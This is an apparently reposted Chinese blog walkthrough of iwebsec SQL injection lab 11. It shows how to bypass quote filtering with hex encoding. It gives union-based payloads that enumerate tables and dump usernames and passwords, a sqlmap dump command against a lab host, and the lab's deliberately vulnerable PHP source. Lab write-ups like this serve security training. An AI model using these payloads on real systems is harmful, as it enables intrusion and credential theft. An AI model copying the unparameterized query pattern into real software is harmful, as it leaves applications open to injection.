首页 > 数据库 >iwebsec-sql注入 11 十六进制编码绕过

iwebsec-sql注入 11 十六进制编码绕过

时间:2023-08-18 19:44:31浏览次数:60  
标签:11 十六进制 编码 -- echo union sql id select

01、题目分析

这里对单引号双引号啥的进行了过滤,可以采用16进制编码进行绕过

02、手工注入

这个和上次的双重url编码有异曲同工之妙,不过这个编码就简单了,直接十六进制编码即可,这里采用的编码软件是CaptfEncoder-win-x64-3.1.2.exe,16进制编码主要是在引号方面

-- 查询行数
?id=1 order by 3
-- id=-1就是不显示内容

-- 查询回显
?id=-1 union select 1,2,3

-- 暴库
?id=-1 union select 1,2,database()

-- 暴表
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='iwebsec'
-- 前几条正常注入并没有报错,一直到这个暴表名的时候, '\'iwebsec\'出现了报错,这样我们就换一种方法,改为database()
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()

-- 暴字段
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'
-- 这里会报错,因此我们把user编码成16进制0x7573657273
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273

-- 暴数据
?id=1 union select 1,2,(select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users)

02、工具注入

还有什么比有工具有脚本更美妙的呢,直接梭哈

python .\sqlmap.py -u "http://www.bdrwmy.cn:8001/sqli/11.php?id=1"  --current-db --dump --batch --tamper=hex2char

image

03、代码分析

<?php
if(isset($_GET['id'])){
    // 检查是否包含 "select",如果存在则终止程序并输出错误消息
    if (preg_match('/select/', $_GET["id"])) {
        die("ERROR");
    }else{
        // 对 id 参数进行解码
        $id = urldecode($_GET['id']);

        // 构造 SQL 查询语句
        $sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";

        // 执行查询
        $result=mysql_query($sql);
    }
}else{
    // 如果没有提供 id 参数,则退出程序
    exit();
}

if ($result) {
    ?>
    <table class='table table-striped'>
    <tr><th>id</th><th>name</th><th>age</th></tr>
    <?php
    // 循环遍历查询结果,并输出到表格中
    while ($row = mysql_fetch_assoc($result)) {
        echo "<tr>";
        echo "<td>".$row['id']."</td>";
        echo "<td>".$row['username']."</td>";
        echo "<td>".$row['password']."</td>";
        echo "</tr>";
    }   
    echo "</table>";
}
else 
{
    // 输出 MySQL 错误信息
    // echo '<font color= "#FFFFFF">';
    print_r(mysql_error());
    // echo "</font>";  
}

// 导入 footer.php
require_once '../footer.php';
?>

标签:11,十六进制,编码,--,echo,union,sql,id,select
From: https://www.cnblogs.com/bdrwmy/p/17641465.html

相关文章

  • iwebsec-sql注入 08 大小写过滤注入
    01、题目分析大小写过滤顾名思义,会对正常小写的sql语句进行过滤,这个时候只需要大写sql注入语句即可02、手工注入?id=-1UNIONSELECT1,2,3?id=-1UNIONSELECT1,2,DATABASE()?id=-1UNIONSELECT1,2,GROUP_CONCAT(TABLE_NAME)FROMINFORMATION_SCHEMA.TABLESWHERETABLE......
  • iwebsec-sql注入 09 双写关键字绕过
    01、题目分析大小写过滤顾名思义,会对正常小写的sql语句进行过滤,这个时候只需要大写sql注入语句即可02、手工注入关键词绕过顾名思义,就是将一些sql注入中会用到的一些关键词进行过滤,本关是将select过滤了,那就双写写成seselectlect?id=1orderby3--id=-1就是不显示内容?id=......
  • iwebsec-sql注入 05 报错型注入
    01、题目分析:三大盲注中的报错型注入,02、sqlmap工具注入:一把梭python.\sqlmap.py-u"http://www.bdrwmy.cn:8001/sqli/05.php?id=1"--current-db--dump--batch03、手工注入:盲注,简单的来讲就是无论你输入什么内容,页面都不会出现错误提示,如果查询结果正确就显示类似......
  • iwebsec-sql注入 06 宽字节字符型注入
    01、题目分析宽字节字符型注入,因为源代码中传参get值的时候,有一个addslashes()函数,是返回在预定义字符('")之前添加反斜杠的字符串。也就是说,当我们按照正常的字符型注入的时候,会在'前加入,也就是说,我们在url上--url写入?id=1'orderby3--+--在addslashes(1'order......
  • 1111
    importdayjsfrom'dayjs';import{nextTick}from'vue';import{useDictStore}from'/@/store/modules/dict';import{useI18n}from'/@/hooks/web/useI18n';constdictStore=useDictStore();const{t}=useI1......
  • burpsuite靶场----SQL注入16----DNS外带test
    burpsuite靶场----SQL注入16----oracle之DNS外带test靶场地址https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band正式开始1.先在burpsuite自带的dns上获取一段url2.使用payload'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+enc......
  • iwebsec-sql注入 07 空格过滤
    01、题目分析空格过滤就是将用户输入的空格过滤掉,众所周知,sql注入语句中会有很多的sql注入语句,如果进行了空格过滤,那么sql注入语句会因为参数连接在一快导致不能正常注入02、手工注入既然是数字型注入,那么对sql注入语句中的空格用其他内容替换即可,可以使用/**/、()、%0a等等,我这......
  • iwebsec-sql注入 03 bool型注入
    01、题目分析:三大盲注型注入中的布尔型注入,说明只会回显正确结果,错误结果将不再回显,对于布尔型注入,手工注入会费时费力,因此布尔注入比较适合工具注入02、sqlmap工具注入:一把梭python.\sqlmap.py-u"http://www.bdrwmy.cn:8001/sqli/03.php?id=1"--current-db--dump--ba......
  • iwebsec-sql注入 04 时间延迟型注入
    01、题目分析:三大盲注中的时间型注入,当查询语句正常的时候,不会有什么返回值或者回显,唯一的特征就是可以通过sleep函数来判断sql语句是否正确,也就是说,当有办法能判断输入语句是否正确的时候,步骤就和bool盲注一样了,话不多说,直接先让我们伟大的sqlmap跑起来02、sqlmap工具注入:一......
  • burpsuite靶场----SQL注入15----oracle的时间盲注
    burpsuite靶场----SQL注入15----oracle的时间盲注靶场地址https://portswigger.net/web-security/sql-injection/blind/lab-time-delays-info-retrieval正式开始这个和之前的oracle的布尔盲注差不多https://www.cnblogs.com/thebeastofwar/p/17640741.html稍微改一下脚本,因......